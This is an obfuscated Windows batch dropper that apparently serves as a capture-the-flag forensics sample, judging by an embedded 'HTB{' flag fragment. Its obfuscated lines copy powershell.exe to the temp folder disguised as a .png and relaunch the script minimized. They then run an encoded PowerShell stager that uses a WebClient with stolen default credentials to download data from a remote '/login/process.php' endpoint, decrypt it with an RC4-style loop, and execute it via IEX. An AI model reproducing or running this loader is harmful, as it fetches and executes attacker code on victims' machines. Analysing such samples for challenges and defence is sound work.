@echo off
echo.
echo                    \--/                                            \--/
echo                 /`-'  '-`\                                      /`-'  '-`\
echo                /          \                                    /          \
echo               /."|/\  /\|".\                                  /."|/\  /\|".\
echo                     \/                                              \/
echo
echo
echo                                         \--/                                            \--/
echo                                      /`-'  '-`\                                      /`-'  '-`\
echo                                     /          \                                    /          \
echo                                    /."|/\  /\|".\                                  /."|/\  /\|".\
echo                                          \/                                              \/
echo.

set "Rvsbpmhlmt=exit"
set "Txincqurfx=if not DEFINED IS_MI" & set "Zqcyqidklg=min "%~dpnx0" %* && " & set "Onkhhdyhhb=NIMIZED set IS_MINIM" & set "Mqiirtukji=IZED=1 && start "" /"
%Txincqurfx%%Onkhhdyhhb%%Mqiirtukji%%Zqcyqidklg%%Rvsbpmhlmt%

set "Tdoblhowds=erShell\v1.0\powersh" & set "Avvntausem=ell.exe %temp%\Eartt" & set "Ljyquixmun=\System32\WindowsPow" & set "Ghgrymkrbp=xmxaqr.png"
set "Anvakrxgse= /y /h /i C:\Windows"
set "Vjhwyxllqy=echo F | xcopy /d /q"
%Vjhwyxllqy%%Anvakrxgse%%Ljyquixmun%%Tdoblhowds%%Avvntausem%%Ghgrymkrbp%
set "Ihhmxwdywx= /y /h /i %0 %temp%"
set "Dadpolxunf=echo F | xcopy /d /q"
set "Unscdsiwaa=Earttxmxaqr.png.bat"
%Dadpolxunf%%Ihhmxwdywx%%Unscdsiwaa%
cls
set "xkcscoxdxe=ACUAMgA1ADYAXQB9AH0A"
set "vjcwqonetf=AEMAbwB1AG4AdABdACkA"
set "rbqecbginc=ACQAaQB2AD0AJABkAGEA"
set "uuhyczmmxe=AC0AagBvAGkAbgBbAEMA"
set "inyahuzxoo=AGMAawBvACcAOwAkAHMA"
set "epijlrhjmq=YgA0AHQAXwBmADEAbAAz"
set "tnksxiibte=aQBjAGUAUABvAGkAbgB0"
set "yeitcnwdjv=TgBlAHQALgBXAGUAYgBD"
set "dfbbguetbi=LgBDAHIAZQBkAGUAbgB0"
set "dfbkfcybvd=AEoAXQAsACQAUwBbACQA"
set "wgyylpwodl=LgAuADIANQA1ADsAMAAu"
set "owdgfkrmmu=ZQBtAC4ATgBlAHQALgBX"
set "crjpoyymri=LgBQAHIAbwB4AHkAOwAk"
set "kkuvpmsxnx=NABTAHQAcgBpAG4AZwAo"
set "oxzuhafyty=XQA6ADoARQB4AHAAZQBj"
set "laamgfxxbt=AHMAYwA0AHQAMwBkAF8A"
set "kcijfzedak=AHQAJwAsACQAdQApADsA"
set "twtebvsaka=LQBPAGIAagBlAGMAdAAg"
set "rlfaegqlsg=aQBwAHQAOgBQAHIAbwB4"
set "nemzfezpoy=AC4AQQBkAGQAKAAnAFUA"
set "tekuivufxk=AFsAJABJAF0AOwAkAF8A"
set "nnhkxernpw=AGEAdABhAD0AJAB3AGMA"
set "zwqujbxyth=cgBvAGMAZQBzAHMALgBw"
set "rtkivjiqyi=dAAvADcALgAwADsAIABy"
set "qazgeuuryt=ACAAVAByAGkAZABlAG4A"
set "freecdurxu=OwAgAFcATwBXADYANAA7"
set "rbltgxozsy=AHsAJABJAD0AKAAkAEkA"
set "hxrxbmcrab=LQBiAHgAbwByACQAUwBb"
set "mtozbwhmdh=AC4AJABkAGEAdABhAC4A"
set "ggrgkijhev=AC4AMgA1ADUAfAAlAHsA"
set "zctzhvkube=AEsAPQBbAFMAeQBzAHQA"
set "slzbngdcxw=AGwAcwA7ACQAUwBjAHIA"
set "xrmnnquwgb=AE4AZQB0AC4AQwByAGUA"
set "iksmcfhnba=JAB3AGMALgBQAHIAbwB4"
set "pwojxvfdhy=AF0AKQAlADIANQA2ADsA"
set "cksjilhxsl=ACkAOwAkAFIAPQB7ACQA"
set "unuxwliqbr=AHIAcwBpAG8AbgAuAE0A"
set "ankyzawudo=JQAyADUANgA7ACQAUwBb"
set "jklvvznyoo=YgBsAGUALgBQAFMAVgBl"
set "mpmxufelmw=AHMAXwBjADQAbgBfAGIA"
set "ijtnxiydgk=IABsAGkAawBlACAARwBl"
set "livcnxklbi=AEEARABVAEEATQBnAEEA"
set "ywpjosgjdg=JABKAF0APQAkAFMAWwAk"
set "amedfzkpqa=AGkAYQBsAHMAIAA9ACAA"
set "fztuwvreiu=bABlAG4AZwB0AGgAXQA7"
set "cfsfpfaifn=AHkAPQBbAFMAeQBzAHQA"
set "talukgjglh=AGUAdAAuAFMAZQByAHYA"
set "gdxqtuxjtg=AG8AbQBCAGEAcwBlADYA"
set "udtkpvpwlh=dABlAHMAKAAnAGsAJQBO"
set "kkqqmvlfek=ACQAZgBsAGEAZwA9ACcA"
set "xynekerpsz=ACQASwApACkAfABJAEUA"
set "tgznzidgdc=ACQAXwBdACwAJABTAFsA"
set "xkbtgjgsbm=dABhAFsAMAAuAC4AMwBd"
set "dpbpdabswl=AGEAdQBsAHQAVwBlAGIA"
set "tkspqgfezg=ACQAdwBjAD0ATgBlAHcA"
set "xnsddewkjt=KABXAGkAbgBkAG8AdwBz"
set "vkxtpcsvkp=RAAsACQASwA9ACQAQQBy"
set "hkihdroftw=AGUAYgBSAGUAcQB1AGUA"
set "lwmpnyaakc=SABxAGYAZABvAH0ARgBa"
set "vbrffrcyuk=cwBlAHIALQBBAGcAZQBu"
set "qifiosnmwm=AFkAaQA3ACMAQwBQADUA"
set "cvxqumcgfs=eQBkAHIAegA9AEMAeABw"
set "zxavotsvle=AH0AJwA7ACQASAA9ACgA"
set "dfwfymvxpv=AH4ALQB7ACEAUQBVADEA"
set "pbervxlqvc=AFMAWwAkAF8AXQArACQA"
set "primtbeqjb=AGgAcAAnADsAJAB3AGMA"
set "hzdehetswc=OwAkAHcAYwAuAEgAZQBh"
set "hbqmigzuyd=AGwAbwBnAGkAbgAvAHAA"
set "ymqktainir=AGcAKABbAEMAbwBuAHYA"
set "akmeqpqplz=MABzAD0AIgApADsAJABk"
set "rhieovvavv=dABhACAAKAAkAEkAVgAr"
set "frcuonrsae=cQB3AFYAYQA1AEEAMwBr"
set "vmoothwjeg=QQBEAGsAQQBPAEEAQQB1"
set "ezwgclnoht=MwBfADQAXwBtADMAcwBz"
set "tajqgeimkk=UwBbACQASABdACwAJABT"
set "gggylivaaj=AHkAIAA9ACAAJAB3AGMA"
set "dtbpjnfqte=RABlAGYAYQB1AGwAdABO"
set "talwelwshg=AGwAaQBlAG4AdAA7ACQA"
set "gwhtilbklu=WAA=" & set "Xtnpsjntki=%temp%\Earttxmxaqr.p"
set "eubxycigil=AEkALgBHAGUAdABCAHkA"
set "yxtvktkqbj=LgBIAGUAYQBkAGUAcgBz"
set "gldgpaqmdi=ADgAQQBMAHcAQQAzAEEA"
set "nltfuhtqsp=AHYAOgAxADEALgAwACkA"
set "arirjwuufe=ZABpAG4AZwBdADoAOgBV"
set "iyxnbwqwvj=AGMALgBQAHIAbwB4AHkA"
set "groykdejaf=ZQByAHQAXQA6ADoARgBy"
set "kfknsjurus=SwBbACQAXwAlACQASwAu"
set "xoezfsghqq=AEUAbgBjAG8AZABpAG4A"
set "dwoqpodpsx=UAByAG8AeAB5ADsAJAB3"
set "ljwlrzenef=JABkAGEAdABhAFsANAAu"
set "peaqqqzjhx=AG4AaQBjAG8AZABlAC4A"
set "ipvgcrqunf=AHIAcwBpAG8AbgBUAGEA"
set "adoosmqieq=AHQAMQAwADAAQwBvAG4A"
set "tpxihlfyyl=ADQAQQBEAE0AQQAnACkA"
set "hfvvkjkppw=KwAkAFMAWwAkAEgAXQAp"
set "btfeyoqgdd=KQApADsAJAB0AD0AJwAv"
set "tnjodalaim=AEsAcgBaAGMAdgBKADMA"
set "qwfhawtkpd=AGQAZQByAHMALgBBAGQA"
set "sfrjcuonvm=ACgAJABTAFsAJABJAF0A"
set "pixeueaexo=RwBlAHQAUwB0AHIAaQBu"
set "mtdhxnskxu=cwBlAHIAKwAkAHQAKQA7"
set "aktiwqjlij=AGUAdAB3AG8AcgBrAEMA"
set "yxqthvhhnc=AFcAZwBGADcAUQB1AGoA"
set "ooerzyphxp=AGwAYQAvADUALgAwACAA"
set "uvbsyaoahv=AGUAIgAsACIAawBwAFAA"
set "ztrqzcsghu=dQA9ACcATQBvAHoAaQBs"
set "prqqperknc=AGEAYwBoAGUAXQA6ADoA"
set "rrqelfomcx=QgBFAD0AegAuADkAbAAn"
set "zemewtnpgi=AFMAeQBzAHQAZQBtAC4A"
set "fwafmpmjol=JABTAFsAJABJAF0ALAAk"
set "xmbiatjqzd=cwB0AF0AOgA6AEQAZQBm"
set "gnvquaaikl=AE0AYQBuAGEAZwBlAHIA"
set "jucgtcyjlz=ZQBtAC4AVABlAHgAdAAu"
set "gchigjdpna=LgBEAG8AdwBuAGwAbwBh"
set "klymlpbwwk=YQBqAG8AcgAgAC0AZwBl"
set "iwnclvszmb=XwBdAH0AOwAkAEQAfAAl"
set "iqoqanaaht=AGcAcwA7ACQAUwA9ADAA"
set "dmzvddozpq=WwBTAHkAcwB0AGUAbQAu"
set "jbdzflrwit=JABKAD0AKAAkAEoAKwAk"
set "dympkboccz=RABjAEEATABnAEEAMwBB"
set "ncqfvygbex=SABUAEIAewAwAGIAZgB1" & set "Uvpjcsfkps=ng -win 1 -enc "
set "pgssozxnkn=KwAxACkAJQAyADUANgA7"
set "niyfborvvb=AFMAWwAkAEgAXQA9ACQA"
set "ifeszkpyma=ACAAJABSACAAJABkAGEA"
set "rbwcdidvor=ZwBdADoAOgBBAFMAQwBJ"
set "bvqepppuph=ZABlAG4AdABpAGEAbABD"
set "inghbxsuez=aABhAHIAWwBdAF0AKAAm"
set "lhksbxgxno=ACcAYQBBAEIAMABBAEgA"
set "jlzegvmqkh=dABpAG4AdQBlAD0AMAA7"
set "bnimzrairh=AHgAdAAuAEUAbgBjAG8A"
set "tirgstjpnp=UQBBAGMAQQBBADYAQQBD"
set "vayhzkaoxh=AGQARABhAHQAYQAoACQA"
set "rkqopnuhak=ZQByAD0AJAAoAFsAVABl"
set "sbcgacqtjz=AEQAUQBBAEwAZwBBAHgA"
set "mjugibbccj=NgBBAEQAZwBBAE0AQQBB"
set "abfcbernie=ACAATgBUACAANgAuADEA"
set "lrowavctaw=ZAAoACIAQwBvAG8AawBp"
set "mxtypxhupc=JABIACsAJABTAFsAJABJ"
set "eejhicejye=ADsAJABkAGEAdABhAD0A"
set "mbruopeait=cgBlAGQAZQBuAHQAaQBh"
set "dysfnbgmrs=ACAAMwApAHsAfQA7AFsA"
set "llecwxirrv=SQBmACgAJABQAFMAVgBl"
set "odqqbrqxgc=UwB5AHMAdABlAG0ALgBO"

%Xtnpsjntki%%Uvpjcsfkps%%llecwxirrv%%ipvgcrqunf%%jklvvznyoo%%unuxwliqbr%%klymlpbwwk%%dysfnbgmrs%%odqqbrqxgc%%talukgjglh%%tnksxiibte%%gnvquaaikl%%oxzuhafyty%%adoosmqieq%%jlzegvmqkh%%tkspqgfezg%%twtebvsaka%%zemewtnpgi%%yeitcnwdjv%%talwelwshg%%ztrqzcsghu%%ooerzyphxp%%xnsddewkjt%%abfcbernie%%freecdurxu%%qazgeuuryt%%rtkivjiqyi%%nltfuhtqsp%%ijtnxiydgk%%inyahuzxoo%%rkqopnuhak%%bnimzrairh%%arirjwuufe%%peaqqqzjhx%%pixeueaexo%%ymqktainir%%groykdejaf%%gdxqtuxjtg%%kkuvpmsxnx%%lhksbxgxno%%tirgstjpnp%%gldgpaqmdi%%dympkboccz%%sbcgacqtjz%%vmoothwjeg%%livcnxklbi%%mjugibbccj%%tpxihlfyyl%%btfeyoqgdd%%hbqmigzuyd%%zwqujbxyth%%primtbeqjb%%yxtvktkqbj%%nemzfezpoy%%vbrffrcyuk%%kcijfzedak%%iksmcfhnba%%cfsfpfaifn%%owdgfkrmmu%%hkihdroftw%%xmbiatjqzd%%dpbpdabswl%%dwoqpodpsx%%iyxnbwqwvj%%dfbbguetbi%%amedfzkpqa%%dmzvddozpq%%xrmnnquwgb%%bvqepppuph%%prqqperknc%%dtbpjnfqte%%aktiwqjlij%%mbruopeait%%slzbngdcxw%%rlfaegqlsg%%gggylivaaj%%crjpoyymri%%zctzhvkube%%jucgtcyjlz%%xoezfsghqq%%rbwcdidvor%%eubxycigil%%udtkpvpwlh%%dfwfymvxpv%%lwmpnyaakc%%qifiosnmwm%%rrqelfomcx%%cksjilhxsl%%vkxtpcsvkp%%iqoqanaaht%%wgyylpwodl%%ggrgkijhev%%jbdzflrwit%%pbervxlqvc%%kfknsjurus%%vjcwqonetf%%ankyzawudo%%tgznzidgdc%%ywpjosgjdg%%dfbkfcybvd%%iwnclvszmb%%rbltgxozsy%%pgssozxnkn%%kkqqmvlfek%%ncqfvygbex%%laamgfxxbt%%epijlrhjmq%%mpmxufelmw%%ezwgclnoht%%zxavotsvle%%mxtypxhupc%%pwojxvfdhy%%fwafmpmjol%%niyfborvvb%%tajqgeimkk%%tekuivufxk%%hxrxbmcrab%%sfrjcuonvm%%hfvvkjkppw%%xkcscoxdxe%%hzdehetswc%%qwfhawtkpd%%lrowavctaw%%uvbsyaoahv%%cvxqumcgfs%%tnjodalaim%%frcuonrsae%%yxqthvhhnc%%akmeqpqplz%%nnhkxernpw%%gchigjdpna%%vayhzkaoxh%%mtdhxnskxu%%rbqecbginc%%xkbtgjgsbm%%eejhicejye%%ljwlrzenef%%mtozbwhmdh%%fztuwvreiu%%uuhyczmmxe%%inghbxsuez%%ifeszkpyma%%rhieovvavv%%xynekerpsz%%gwhtilbklu%